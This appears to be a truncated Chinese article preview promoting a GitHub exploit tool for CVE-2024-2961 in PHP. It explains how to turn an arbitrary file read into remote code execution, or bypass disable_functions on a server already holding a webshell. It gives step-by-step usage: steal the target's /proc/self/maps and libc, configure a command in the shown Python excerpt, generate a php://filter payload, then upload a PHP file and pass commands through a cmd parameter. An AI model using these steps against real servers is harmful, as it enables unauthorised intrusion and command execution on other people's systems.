文章预览
https://github.com/kezibei/php-filter-iconv 这个项目可以利用CVE-2024-2961打php,将任意文件读取转化成RCE。或者已经拿到webshell的情况下,利用CVE-2024-2961 bypass disable_functions。 php-filter-iconv.py用法 先通过任意文件下载漏洞获取目标的/proc/self/maps和libc-2.x.so,在本机和php-filter-iconv.py放在同目录,然后运行脚本即可生成php://filter/的RCE payload,详细参数调整如下代码即可。 ....... maps_path = './maps' cmd = 'echo 123 > 1.txt' sleep_time = 1 padding = 20 if not os.path.exists(maps_path): exit( "[-]no maps file" ) regions = get_regions(maps_path) heap, libc_info = get_symbols_and_addresses(regions) libc_path = libc_info.path print("[*]download: "+libc_path) libc_path = './libc-2.23.so' ....... php-filter-iconv.php用法 直接上传到已经获得webshell的服务器进行bypass disable_functions,然后访问如下链接检测环境。 /php-filter-iconv.php?cmd=curl 127.0.0.1:8888 =0 然
………………………………